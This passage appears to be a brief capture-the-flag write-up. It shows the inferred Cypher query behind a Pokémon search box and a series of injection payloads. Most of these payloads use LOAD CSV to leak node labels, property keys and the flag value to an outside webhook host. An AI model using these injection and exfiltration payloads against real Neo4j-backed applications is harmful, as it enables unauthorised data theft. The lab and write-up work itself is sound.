One comma causes an error = injection. But its not SQL, but from the returened error it seems to be neo4j db. After some trial and error, came to conclusion that the query looks something like this: MATCH (pokemon:Pokemon) WHERE p.name =~ '.*' + toLower({param}) + '.*' RETURN p

sending this: ') RETURN pokemon// works perfectly

Abuse LOAD CSV to leak some information:

') CALL db.labels() YIELD name as label LOAD CSV FROM 'https://webhook.site/REDACTED/'+label AS y RETURN *//

reveals that there are two types of nodes in the graph: pokemon and flag. now trying to read the properties of flag: ') MATCH (f:flag) WITH KEYS(f) as keys UNWIND keys as key LOAD CSV FROM 'https://webhook.site/REDACTED/'+key AS y RETURN *//

reveals a property flag:

') MATCH (f:flag) WITH f.flag as ff LOAD CSV FROM 'https://webhook.site/REDACTED/'+ff AS y RETURN *//